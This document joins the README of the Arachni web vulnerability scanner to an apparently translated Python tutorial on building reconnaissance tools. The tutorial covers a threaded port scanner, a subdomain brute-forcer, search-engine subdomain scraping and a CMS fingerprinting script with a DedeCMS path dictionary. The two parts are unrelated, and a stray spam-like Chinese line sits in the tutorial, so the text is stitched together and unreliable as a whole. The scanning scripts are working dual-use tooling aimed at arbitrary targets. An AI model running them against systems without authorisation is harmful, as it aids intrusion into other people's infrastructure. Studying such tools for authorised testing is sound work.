Note: Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components.

Arachni offers:

A stable, efficient, high-performance framework

Check, report and plugin developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals.

Furthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks.

Moreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans.

Simplicity

Although some parts of the Framework are fairly complex, you will never have to deal with them directly. From a user’s or a component developer’s point of view everything appears simple and straight-forward all the while providing power, performance and flexibility.

From the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance.

In simple terms

Arachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings.

Features

General

  • Cookie-jar/cookie-string support.
  • Custom header support.
  • SSL support with fine-grained options.
  • User Agent spoofing.
  • Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
  • Proxy authentication.
  • Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others).
  • Automatic log-out detection and re-login during the scan (when the initial login was performed via the autologin, login_script or proxy plugins).
  • Custom 404 page detection.
  • UI abstraction:
  • Pause/resume functionality.
  • Hibernation support -- Suspend to and restore from disk.
  • High performance asynchronous HTTP requests.
    • With adjustable concurrency.
    • With the ability to auto-detect server health and adjust its concurrency automatically.
  • Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs.

Integrated browser environment

Arachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc.

In addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni's browsers also hook into popular frameworks to make the logged data easier to digest:

In essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time.

Relevant information includes:

  • Page DOM, as HTML code.
    • With a list of DOM transitions required to restore the state of the page to the one at the time it was logged.
  • Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code.
    • With a list of DOM transitions.
  • Data-flow sinks -- Each sink is a JS method which received a tainted argument.
    • Parent object of the method (ex.: DOMWindow).
    • Method signature (ex.: decodeURIComponent()).
    • Arguments list.
      • With the identified taint located recursively in the included objects.
    • Method source code.
    • JS stacktrace.
  • Execution flow sinks -- Each sink is a successfully executed JS payload, as injected by the security checks.
    • Includes a JS stacktrace.
  • JavaScript stack-traces include:
    • Method names.
    • Method locations.
    • Method source codes.
    • Argument lists.

In essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue.

Browser-cluster

The browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion.

Configuration options include:

  • Adjustable pool-size, i.e. the amount of browser workers to utilize.
  • Timeout for each job.
  • Worker TTL counted in jobs -- Workers which exceed the TTL have their browser process respawned.
  • Ability to disable loading images.
  • Adjustable screen width and height.
    • Can be used to analyze responsive and mobile applications.
  • Ability to wait until certain elements appear in the page.
  • Configurable local storage data.

Coverage

The system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would.

In addition to that, it also knows which browser state changes the application has been programmed to handle and is able to trigger them programmatically in order to provide coverage for a full set of possible scenarios.

By inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs:

  • Forms
    • Along with ones that require interaction via a real browser due to DOM events.
  • User-interface Forms
    • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
  • User-interface Inputs
    • Orphan <input> elements with associated DOM events.
  • Links
    • Along with ones that have client-side parameters in their fragment, i.e.: http://example.com/#/?param=val&param2=val2
    • With support for rewrite rules.
  • LinkTemplates -- Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates -- useful when rewrite rules are not available.
    • Along with ones that have client-side parameters in their URL fragments, i.e.: http://example.com/#/param/val/param2/val2
  • Cookies
  • Headers
  • Generic client-side elements which have associated DOM events.
  • AJAX-request parameters.
  • JSON request data.
  • XML request data.

Open distributed architecture

Arachni is designed to fit into your workflow and easily integrate with your existing infrastructure.

Depending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol.

Both approaches allow you to:

  • Remotely monitor and manage scans.
  • Perform multiple scans at the same time -- Each scan is compartmentalized to its own OS process to take advantage of:
    • Multi-core/SMP architectures.
    • OS-level scheduling/restrictions.
    • Sandboxed failure propagation.
  • Communicate over a secure channel.

REST API

  • Very simple and straightforward API.
  • Easy interoperability with non-Ruby systems.
    • Operates over HTTP.
    • Uses JSON to format messages.
  • Stateful scan monitoring.
    • Unique sessions automatically only receive updates when polling for progress, rather than full data.

RPC API

  • High-performance/low-bandwidth communication protocol.
    • MessagePack serialization for performance, efficiency and ease of integration with 3rd party systems.
  • Grid:
    • Self-healing.
    • Scale up/down by hot-plugging/hot-unplugging nodes.
      • Can scale up infinitely by adding nodes to increase scan capacity.
    • (Always-on) Load-balancing -- All Instances are automatically provided by the least burdened Grid member.
      • With optional per-scan opt-out/override.
    • (Optional) High-Performance mode -- Combines the resources of multiple nodes to perform multi-Instance scans.
      • Enabled on a per-scan basis.

Scope configuration

  • Filters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters.
    • Can optionally detect and ignore redundant pages automatically.
  • URL exclusion filters using regular expressions.
  • Page exclusion filters based on content, using regular expressions.
  • URL inclusion filters using regular expressions.
  • Can be forced to only follow HTTPS paths and not downgrade to HTTP.
  • Can optionally follow subdomains.
  • Adjustable page count limit.
  • Adjustable redirect limit.
  • Adjustable directory depth limit.
  • Adjustable DOM depth limit.
  • Adjustment using URL-rewrite rules.
  • Can read paths from multiple user supplied files (to both restrict and extend the scope).

Audit

  • Can audit:
    • Forms
      • Can automatically refresh nonce tokens.
      • Can submit them via the integrated browser environment.
    • User-interface Forms
      • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
    • User-interface Inputs
      • Orphan <input> elements with associated DOM events.
    • Links
      • Can load them via the integrated browser environment.
    • LinkTemplates
      • Can load them via the integrated browser environment.
    • Cookies
      • Can load them via the integrated browser environment.
    • Headers
    • Generic client-side DOM elements.
    • JSON request data.
    • XML request data.
  • Can ignore binary/non-text pages.
  • Can audit elements using both GET and POST HTTP methods.
  • Can inject both raw and HTTP encoded payloads.
  • Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage.
  • Can exclude specific input vectors by name.
  • Can include specific input vectors by name.

Components

Arachni is a highly modular system, employing several components of distinct types to perform its duties.

In addition to enabling or disabling the bundled components so as to adjust the system's behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need.

Platform fingerprinters

In order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads.

Currently, the following platforms can be identified:

  • Operating systems
    • BSD
    • Linux
    • Unix
    • Windows
    • Solaris
  • Web servers
    • Apache
    • IIS
    • Nginx
    • Tomcat
    • Jetty
    • Gunicorn
  • Programming languages
    • PHP
    • ASP
    • ASPX
    • Java
    • Python
    • Ruby
  • Frameworks
    • Rack
    • CakePHP
    • Rails
    • Django
    • ASP.NET MVC
    • JSF
    • CherryPy
    • Nette
    • Symfony

The user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether.

Finally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms.

Checks

Checks are system components which perform security checks and log issues.

Active

Active checks engage the web application via its inputs.

  • SQL injection (sql_injection) -- Error based detection.
    • Oracle
    • InterBase
    • PostgreSQL
    • MySQL
    • MSSQL
    • EMC
    • SQLite
    • DB2
    • Informix
    • Firebird
    • SAP MaxDB
    • Sybase
    • Frontbase
    • Ingres
    • HSQLDB
    • MS Access
  • Blind SQL injection using differential analysis (sql_injection_differential).
  • Blind SQL injection using timing attacks (sql_injection_timing).
    • MySQL
    • PostgreSQL
    • MSSQL
  • NoSQL injection (no_sql_injection) -- Error based vulnerability detection.
  • Blind NoSQL injection using differential analysis (no_sql_injection_differential).
  • CSRF detection (csrf).
  • Code injection (code_injection).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • Blind code injection using timing attacks (code_injection_timing).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • LDAP injection (ldap_injection).
  • Path traversal (path_traversal).
    • *nix
    • Windows
    • Java
  • File inclusion (file_inclusion).
    • *nix
    • Windows
    • Java
    • PHP
    • Perl
  • Response splitting (response_splitting).
  • OS command injection (os_cmd_injection).
    • *nix
    • *BSD
    • IBM AIX
    • Windows
  • Blind OS command injection using timing attacks (os_cmd_injection_timing).
    • Linux
    • *BSD
    • Solaris
    • Windows
  • Remote file inclusion (rfi).
  • Unvalidated redirects (unvalidated_redirect).
  • Unvalidated DOM redirects (unvalidated_redirect_dom).
  • XPath injection (xpath_injection).
    • Generic
    • PHP
    • Java
    • dotNET
    • libXML2
  • XSS (xss).
  • Path XSS (xss_path).
  • XSS in event attributes of HTML elements (xss_event).
  • XSS in HTML tags (xss_tag).
  • XSS in script context (xss_script_context).
  • DOM XSS (xss_dom).
  • DOM XSS script context (xss_dom_script_context).
  • Source code disclosure (source_code_disclosure)
  • XML External Entity (xxe).
    • Linux
    • *BSD
    • Solaris
    • Windows

Passive

Passive checks look for the existence of files, folders and signatures.

  • Allowed HTTP methods (allowed_methods).
  • Back-up files (backup_files).
  • Backup directories (backup_directories)
  • Common administration interfaces (common_admin_interfaces).
  • Common directories (common_directories).
  • Common files (common_files).
  • HTTP PUT (http_put).
  • Insufficient Transport Layer Protection for password forms (unencrypted_password_form).
  • WebDAV detection (webdav).
  • HTTP TRACE detection (xst).
  • Credit Card number disclosure (credit_card).
  • CVS/SVN user disclosure (cvs_svn_users).
  • Private IP address disclosure (private_ip).
  • Common backdoors (backdoors).
  • .htaccess LIMIT misconfiguration (htaccess_limit).
  • Interesting responses (interesting_responses).
  • HTML object grepper (html_objects).
  • E-mail address disclosure (emails).
  • US Social Security Number disclosure (ssn).
  • Forceful directory listing (directory_listing).
  • Mixed Resource/Scripting (mixed_resource).
  • Insecure cookies (insecure_cookies).
  • HttpOnly cookies (http_only_cookies).
  • Auto-complete for password form fields (password_autocomplete).
  • Origin Spoof Access Restriction Bypass (origin_spoof_access_restriction_bypass)
  • Form-based upload (form_upload)
  • localstart.asp (localstart_asp)
  • Cookie set for parent domain (cookie_set_for_parent_domain)
  • Missing Strict-Transport-Security headers for HTTPS sites (hsts).
  • Missing X-Frame-Options headers (x_frame_options).
  • Insecure CORS policy (insecure_cors_policy).
  • Insecure cross-domain policy (allow-access-from) (insecure_cross_domain_policy_access)
  • Insecure cross-domain policy (allow-http-request-headers-from) (insecure_cross_domain_policy_headers)
  • Insecure client-access policy (insecure_client_access_policy)

Reporters

Plugins

Plugins add extra functionality to the system in a modular fashion, this way the core remains lean and makes it easy for anyone to add arbitrary functionality.

  • Passive Proxy (proxy) -- Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit.
  • Form based login (autologin).
  • Script based login (login_script).
  • Dictionary attacker for HTTP Auth (http_dicattack).
  • Dictionary attacker for form based authentication (form_dicattack).
  • Cookie collector (cookie_collector) -- Keeps track of cookies while establishing a timeline of changes.
  • WAF (Web Application Firewall) Detector (waf_detector) -- Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes.
  • BeepNotify (beep_notify) -- Beeps when the scan finishes.
  • EmailNotify (email_notify) -- Sends a notification (and optionally a report) over SMTP at the end of the scan.
  • VectorFeed (vector_feed) -- Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things.
  • Script (script) -- Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery.
  • Uncommon headers (uncommon_headers) -- Logs uncommon headers.
  • Content-types (content_types) -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files.
  • Vector collector (vector_collector) -- Collects information about all seen input vectors which are within the scan scope.
  • Headers collector (headers_collector) -- Collects response headers based on specified criteria.
  • Exec (exec) -- Calls external executables at different scan stages.
  • Metrics (metrics) -- Captures metrics about multiple aspects of the scan and the web application.
  • Restrict to DOM state (restrict_to_dom_state) -- Restricts the audit to a single page's DOM state, based on a URL fragment.
  • Webhook notify (webhook_notify) -- Sends a webhook payload over HTTP at the end of the scan.
  • Rate limiter (rate_limiter) -- Rate limits HTTP requests.
  • Page dump (page_dump) -- Dumps page data to disk as YAML.

Defaults

Default plugins will run for every scan and are placed under /plugins/defaults/.

  • AutoThrottle (autothrottle) -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • Healthmap (healthmap) -- Generates a sitemap showing the health of each crawled/audited URL.

Meta

Plugins under /plugins/defaults/meta/ perform analysis on the scan results to determine trustworthiness or just add context information or general insights.

  • TimingAttacks (timing_attacks) -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS attacks against pages that perform heavy-duty processing.
  • Discovery (discovery) -- Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable.
  • Uniformity (uniformity) -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.

Trainer subsystem

The Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit.

Checks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce.

However, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly.

Still, this can be an invaluable asset to Fuzzer checks.

Running the specs

You can run rake spec to run all specs or you can run them selectively using the following:

rake spec:core            # for the core libraries
rake spec:checks          # for the checks
rake spec:plugins         # for the plugins
rake spec:reports         # for the reports
rake spec:path_extractors # for the path extractors

Please be warned, the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system.

Note: The check specs will take many hours to complete due to the timing-attack tests.

Bug reports/Feature requests

Submit bugs using GitHub Issues and get support via the Support Portal.

Contributing

(Before starting any work, please read the instructions for working with the source code.)

We're happy to accept help from fellow code-monkeys and these are the steps you need to follow in order to contribute code:

  • Fork the project.
  • Start a feature branch based on the experimental branch (git checkout -b <feature-name> experimental).
  • Add specs for your code.
  • Run the spec suite to make sure you didn't break anything (rake spec:core for the core libs or rake spec for everything).
  • Commit and push your changes.
  • Issue a pull request and wait for your code to be reviewed.

License

Arachni Public Source License v1.0 -- please see the LICENSE file for more information.


Python大法之告别脚本小子系列: Writing Information Asset Collection Scripts (Part 1)
Original author: 阿甫哥哥. This article belongs to the i春秋 (ichunqiu) original-content reward program; reproduction without permission is prohibited.

0x01 Preface
After collecting URLs, the next step is gathering information on the target's assets. The better the reconnaissance, the more vulnerabilities you will dig up... The prerequisite for all of it, of course, is patience! Since there are quite a few tools to write, I will split this into two parts...
0x02 Writing a Port Scanner

How port scanning works:
Port scanning, as the name suggests, means probing a range of ports, or a set of specified ports, one by one. The results tell you which services a machine offers, and known vulnerabilities in those services can then be attacked. The principle: when a host asks a remote server to open a connection on some port, the server answers if it provides that service; if the service is not installed, the request to that port goes unanswered. By attempting connections to every well-known port (or any range you choose) and recording the server's answers, you learn which services are installed on the target, for example whether it offers FTP, WWW, or other services.

Proxy servers also use many other common ports.
For example, the HTTP protocol commonly uses 80/8080/3128/8081/9080, FTP commonly uses 21, Telnet commonly uses 23, and so on.
Here is a fuller list...

Common proxy-server ports:
(1) HTTP proxy: 80/8080/3128/8081/9080
(2) SOCKS proxy: 1080
(3) FTP proxy: 21
(4) Telnet proxy: 23
HTTP server: 80/tcp by default (the Executor trojan also opens this port);
HTTPS (securely transferring web pages): 443/tcp and 443/udp by default;
Telnet (insecure text transfer): 23/tcp by default (opened by the Tiny Telnet Server trojan);
FTP: 21/tcp by default (opened by the trojans Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash and Blade Runner);
TFTP (Trivial File Transfer Protocol): 69/udp by default;
SSH (secure login), SCP (file transfer) and port redirection: 22/tcp by default;
SMTP, Simple Mail Transfer Protocol (e-mail): 25/tcp by default (the trojans Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, WinPC and WinSpy all open this port);
POP3, Post Office Protocol (e-mail): 110/tcp by default;
WebLogic: 7001 by default;
WebSphere applications: 9080 by default;
WebSphere admin console: 9090 by default;
JBoss: 8080 by default;
Tomcat: 8080 by default;
Windows 2003 Remote Desktop: 3389 by default;
Symantec AV/Filter for MSE: 8081 by default;
Oracle database: 1521 by default;
Oracle EMCTL: 1158 by default;
Oracle XDB (XML database): 8080 by default;
Oracle XDB FTP service: 2100 by default;
MS SQL Server database server: 1433/tcp and 1433/udp by default;
MS SQL Server database monitor: 1434/tcp and 1434/udp by default;
QQ: 1080/udp by default
...and so on; search online for more details, haha.

The three states of a port
OPEN  -- the port is open; a program is listening and connections succeed
CLOSED  -- the port is reachable, but nothing is listening on it
FILTERED  -- probes get no response; typically a firewall or WAF silently drops them

Let's take a tool, nmap, as an example...
C:\Users\Administrator>nmap -sV localhost
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-03 17:10 China Standard Time
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00053s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 990 closed ports
PORT      STATE SERVICE           VERSION
80/tcp    open  http              Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
135/tcp   open  msrpc             Microsoft Windows RPC
443/tcp   open  ssl/https         VMware Workstation SOAP API 14.1.1
445/tcp   open  microsoft-ds      Microsoft Windows 7 - 10 microsoft-ds (workgroup: WorkGroup)
903/tcp   open  ssl/vmware-auth   VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
1080/tcp  open  http-proxy        Polipo
3306/tcp  open  mysql             MySQL 5.5.53
8088/tcp  open  radan-http?
10000/tcp open  snet-sensor-mgmt?
65000/tcp open  tcpwrapped

That's enough background; let's implement it in Python. Plenty of modules can do port scanning. This article uses the socket module; the single-threaded approach was covered in an earlier article:
一个精壮的代购骗子被我彻底征服
#-*- coding: UTF-8 -*-
import socket
 
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip):
    result_list=list()
    port_list=range(1,65535)
    for port in port_list:
        try:
            s=socket.socket() 
            s.settimeout(0.1)
            s.connect((ip,port))
            openstr= " PORT:"+str(port) +" OPEN "
            print openstr
            result_list.append(port)
            s.close()
        except:
            pass
    print result_list
def main():
    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print 'IP:'+ip
    PortScan(ip)
if __name__=='__main__':  
    main()

Painfully slow, right? Since the goal is to stop being a script kiddie, a single-threaded scanner just won't cut it, haha.
Here is the multithreaded version:
#-*- coding: UTF-8 -*-
import socket
import threading

lock = threading.Lock()
threads = []
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '[-]%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip,port):
    try:
        s=socket.socket() 
        s.settimeout(0.1)
        s.connect((ip,port))
        lock.acquire()
        openstr= "[-] PORT:"+str(port) +" OPEN "
        print openstr
        lock.release()
        s.close()
    except:
        pass
def main():
    banner = '''
                      _                       
     _ __   ___  _ __| |_ ___  ___ __ _ _ __  
    | '_ \ / _ \| '__| __/ __|/ __/ _` | '_ \ 
    | |_) | (_) | |  | |_\__ \ (_| (_| | | | |
    | .__/ \___/|_|   \__|___/\___\__,_|_| |_|
    |_|                                       

            '''
    print banner
    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print '[-] IP:'+ip
    for n in range(1,76):
        for p in range((n-1)*880,n*880):
            t = threading.Thread(target=PortScan,args=(ip,p))
            threads.append(t)
            t.start()     

        for t in threads:
            t.join()
    print ' This scan completed !'
if __name__=='__main__':  
    main()
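For reference, on Python 3 the same connect-scan idea reads more cleanly with concurrent.futures instead of hand-managed threads (my sketch, not part of the original article; function names are mine):

```python
import socket
from concurrent.futures import ThreadPoolExecutor

def check_port(ip, port, timeout=0.2):
    """Return the port number if a TCP connect succeeds, else None."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            return port
    except OSError:  # refused, timed out, unreachable...
        return None

def scan(ip, ports, workers=100):
    """Connect-scan the given ports concurrently; return the open ones, sorted."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        hits = pool.map(lambda p: check_port(ip, p), ports)
    return sorted(p for p in hits if p is not None)
```

The pool caps the number of in-flight connections, so you get the speed of threading without spawning 65,535 threads or juggling locks by hand.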
Very simple; there isn't much more to explain... If your basics aren't solid yet, head over to the beginner series:
Python大法从入门到编写POC
0x03 Writing a Subdomain Collector

Collecting subdomains uncovers more in-scope domains and subdomains, which raises the odds of finding vulnerabilities. There are many collection techniques; rather than rehash them all here, see this article on approaches:
子域名搜集思路与技巧梳理
Honestly, lijiejie's subdomainbrute is good enough on its own... and of course i春秋 has a video course as well:
Python安全工具开发应用
This article demonstrates three approaches.
The first is dictionary brute-forcing, which lives or dies by the wordlist... how many subdomains you find depends on its size.
Here is a single-threaded demo:
#-*- coding: UTF-8 -*-
import requests
import re
import sys

def writtarget(target):
        print target
        file = open('result.txt','a')
        with file as f:
                f.write(target+'\n')

        file.close()


def targetopen(httptarget , httpstarget):


        header = {
                        'Connection': 'keep-alive',
                        'Pragma': 'no-cache',
                        'Cache-Control': 'no-cache',
                        'Upgrade-Insecure-Requests': '1',
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                        'DNT': '1',
                        'Accept-Encoding': 'gzip, deflate',
                        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
                }

        try:
                reponse_http = requests.get(httptarget, timeout=3, headers=header)
                code_http = reponse_http.status_code


                if (code_http == 200):
                        httptarget_result = re.findall('//.*', httptarget)

                        writtarget(httptarget_result[0][2:])

                else:
                        reponse_https = requests.get(httpstarget, timeout=3, headers=header)
                        code_https = reponse_https.status_code
                        if (code_https == 200):
                                httpstarget_result = re.findall('//.*', httpstarget)

                                writtarget(httpstarget_result[0][2:])


        except:
                pass

def domainscan(target):

        f = open('domain.txt','r')
        for line in f:
                httptarget_result = 'http://'+ line.strip() + '.'+target
                httpstarget_result = 'https://'+ line.strip() + '.'+target

                targetopen(httptarget_result, httpstarget_result)

        f.close()

if __name__ == "__main__":
        print ' ____                        _       ____             _       '
        print '|  _ \  ___  _ __ ___   __ _(_)_ __ | __ ) _ __ _   _| |_ ___ '
        print "| | | |/ _ \| '_ ` _ \ / _` | | '_ \|  _ \| '__| | | | __/ _ \  "
        print "| |_| | (_) | | | | | | (_| | | | | | |_) | |  | |_| | ||  __/"
        print '|____/ \___/|_| |_| |_|\__,_|_|_| |_|____/|_|   \__,_|\__\___|'
                                                              


        file = open('result.txt','w+')
        file.truncate()
        file.close()
        target = raw_input('PLEASE INPUT YOUR DOMAIN(Eg:ichunqiu.com):')
        print 'Starting.........'
        domainscan(target)
        print 'Done ! Results in result.txt'

The second approach collects subdomains via search engines, though some subdomains are never indexed...

See this article:
工具| 手把手教你信息收集之子域名收集器
It explains the idea well enough that I'll just adapt its code here:
#-*-coding:utf-8-*-
import requests
import re

key = "qq.com"
sites = []
# Pull subdomain names out of the Baidu result links
match = 'style="text-decoration:none;">(.*?)/'
for i in range(48):
   pn = i * 10
   url = "http://www.baidu.com.cn/s?wd=site:" + key + "&cl=3&pn=%s" % pn
   response = requests.get(url).content
   subdomains = re.findall(match, response)
   sites += list(subdomains)
site = list(set(sites))   # set() removes duplicates
print site
print "The number of sites is %d" % len(site)
for i in site:
   print i

The third method goes through third-party websites; the implementation is similar to the second one.
I covered it in an earlier article, so I'll just reference it here.
If you get stuck, read that article; it is quite detailed...
Python 大法: from HELL0 MOMO to writing a PoC (Part 5)
import requests
import re
import sys
 
def get(domain):
        url = 'http://i.links.cn/subdomain/'
        payload = ("domain={domain}&b2=1&b3=1&b4=1".format(domain=domain))
        r = requests.post(url=url, params=payload)
        con = r.text.encode('ISO-8859-1')
        a = re.compile('value="(.+?)"><input')
        result = a.findall(con)
        output = '\n'.join(result)   # avoid shadowing the built-in name `list`
        print output
if __name__ == '__main__':
        command = sys.argv[1:]
        f = "".join(command)
        get(f)

0x04 Writing a CMS Fingerprinting Script
There are plenty of open-source fingerprinting tools: w3af, whatweb, wpscan, joomscan, and so on. The common identification techniques are:
1: keywords found in the page body
2: hashes of specific files (mainly static files; it does not have to be MD5)
3: keywords at a specific URL
4: TAG patterns at a specific URL
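A minimal sketch of technique 2: hash a static file and compare it against a table of known digests. This example is mine, not from the original article; the path is borrowed from the DedeCMS dictionary later in the post, and the digest shown is just the MD5 of an empty body, not a real fingerprint.

```python
import hashlib

# Hypothetical fingerprint table: URL path -> (known MD5, CMS name).
# The digest below is the MD5 of an empty body, used here only as a placeholder.
FINGERPRINTS = {
    "/templets/default/style/dedecms.css": ("d41d8cd98f00b204e9800998ecf8427e", "DedeCMS"),
}

def md5_of(body):
    """Hex MD5 digest of a fetched response body (bytes)."""
    return hashlib.md5(body).hexdigest()

def match_fingerprint(path, body):
    """Return the CMS name if the static file's hash matches, else None."""
    known = FINGERPRINTS.get(path)
    if known and md5_of(body) == known[0]:
        return known[1]
    return None
```

In a real scanner you would fetch each path from the target, pass the response body to `match_fingerprint`, and stop on the first hit.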

i春秋 (ichunqiu) also has a related course:
Python Security Tool Development and Application
Since I can't afford the course, haha, I won't go over teacher ADO's methods...
Most implementations are about the same anyway; only the modules differ...
In this article I'll show two approaches: one goes through an API, the other is pure fingerprint matching, where how much you can identify depends on the size of your dictionary...
First, the API approach...
Put simply, you send a POST request and pull the keyword out of the response; nothing hard about it...
The fingerprinting site I use is http://whatweb.bugscaner.com/look/ (why does this feel like an ad...). Capture the request, then it's the usual routine...
#-*- coding: UTF-8 -*-
import requests
import json

def what_cms(url):
        headers = {
                'Connection': 'keep-alive',
                'Pragma': 'no-cache',
                'Cache-Control': 'no-cache',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                'DNT': '1',
                'Accept-Encoding': 'gzip, deflate',
                'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
        }
        post={
                'hash':'0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479',
                'url':url,
        }
        r=requests.post(url='http://whatweb.bugscaner.com/what/', data=post, headers=headers)
        dic=json.loads(r.text)
        if dic['cms']=='':
                print 'Sorry,Unidentified........'
        else:
                print 'CMS:' + dic['cms']
if __name__ == '__main__':
        url=raw_input('PLEASE INPUT YOUR TARGET:')
        what_cms(url)


Cool...


Next up is the second CMS fingerprinting method...
I use keyword matching...
Here is a matching dictionary I found for DedeCMS:
Format: path||||keyword||||CMS alias
/data/admin/allowurl.txt||||dedecms||||DedeCMS(织梦)
/data/index.html||||dedecms||||DedeCMS(织梦)
/data/js/index.html||||dedecms||||DedeCMS(织梦)
/data/mytag/index.html||||dedecms||||DedeCMS(织梦)
/data/sessions/index.html||||dedecms||||DedeCMS(织梦)
/data/textdata/index.html||||dedecms||||DedeCMS(织梦)
/dede/action/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/templets/article_coonepage_rule.htm||||dedecms||||DedeCMS(织梦)
/include/alert.htm||||dedecms||||DedeCMS(织梦)
/member/images/base.css||||dedecms||||DedeCMS(织梦)
/member/js/box.js||||dedecms||||DedeCMS(织梦)
/php/modpage/readme.txt||||dedecms||||DedeCMS(织梦)
/plus/sitemap.html||||dedecms||||DedeCMS(织梦)
/setup/license.html||||dedecms||||DedeCMS(织梦)
/special/index.html||||dedecms||||DedeCMS(织梦)
/templets/default/style/dedecms.css||||dedecms||||DedeCMS(织梦)
/company/template/default/search_list.htm||||dedecms||||DedeCMS(织梦)

For a complete dictionary, search Baidu; this is all I've got... I work on Deepin, since the errors under Windows are too fiddly and I couldn't be bothered to fix them...
#-*- coding: UTF-8 -*-
import os
import threading
import urllib2

identification = False
g_index = 0
lock = threading.Lock()

def list_file(dir):
    files = os.listdir(dir)
    return  files

def request_url(url='', data=None, header=None):
    # Use None instead of a mutable default argument for the headers
    page_content = ''
    request = urllib2.Request(url, data, header or {})

    try:
        response = urllib2.urlopen(request)
        page_content = response.read()
    except Exception, e:
        pass

    return page_content

def whatweb(target):
    global identification
    global g_index
    global cms

    while True:
        if identification:
            break

        if g_index > len(cms)-1:
            break

        lock.acquire()
        eachline = cms[g_index]
        g_index = g_index + 1
        lock.release()

        if len(eachline.strip())==0 or eachline.startswith('#'):
            pass
        else:
            url, pattern, cmsname = eachline.split('||||')
            html = request_url(target+url)
            rate = float(g_index)/float(len(cms))
            ratenum = int(100*rate)

            if pattern.upper() in html.upper():
                identification = True
